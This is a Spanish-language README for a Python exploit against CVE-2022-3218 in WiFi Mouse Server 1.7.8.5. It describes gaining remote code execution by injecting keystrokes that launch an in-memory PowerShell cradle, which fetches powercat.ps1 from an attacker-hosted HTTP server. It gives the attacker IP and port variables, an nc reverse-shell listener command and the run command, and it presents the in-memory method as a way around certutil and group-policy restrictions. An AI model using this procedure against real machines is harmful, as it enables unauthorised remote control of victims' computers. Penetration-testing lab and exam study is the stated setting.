
Exploit PoC para CVE-2022-3218 dirigido a WiFi Mouse Server 1.7.8.5, que logra RCE mediante inyección de teclado y entrega de payload de PowerShell en memoria para laboratorios endurecidos.
Un exploit optimizado de Prueba de Concepto (PoC) en Python 3 para WiFi Mouse Server v1.7.8.5. Este script aprovecha una vulnerabilidad inherente del protocolo para lograr la Ejecución Remota de Código (RCE) mediante la inyección automatizada de pulsaciones de teclado.
Esta versión ha sido explícitamente modificada y ajustada para entornos de laboratorio donde los exploits públicos tradicionales fallan debido a restricciones de endurecimiento del host (como la ejecución restringida de certutil.exe o el bloqueo de descargas de binarios).
cmd.exe y certutil.exe para colocar un ejecutable malicioso en disco. En estructuras de laboratorio/examen endurecidas o modernas, estos LOLBins suelen estar restringidos o bloqueados por directivas de grupo locales. Esta versión modificada traslada el vector completamente a memoria mediante una cuna web de PowerShell usando powercat.ps1.Abre el script y actualiza las variables de configuración al inicio del archivo con los ajustes de tu entorno local:
rhost = sys.argv[1]
lhost = "192.168.45.167" # Your Attacker/Kali IP
lport = "443" # Your Netcat Listener Port
http_port = "80" # Your local HTTP Server Port hosting powercat
Hospeda powercat.ps1 en tu máquina atacante local dentro de un directorio:
python3 -m http.server 80
En una pestaña de terminal separada, establece tu listener de reverse shell en el lport configurado:
nc -lvnp 443
Ejecuta el script contra la dirección IP de la máquina objetivo:
python3 exploit.py <TARGET-IP>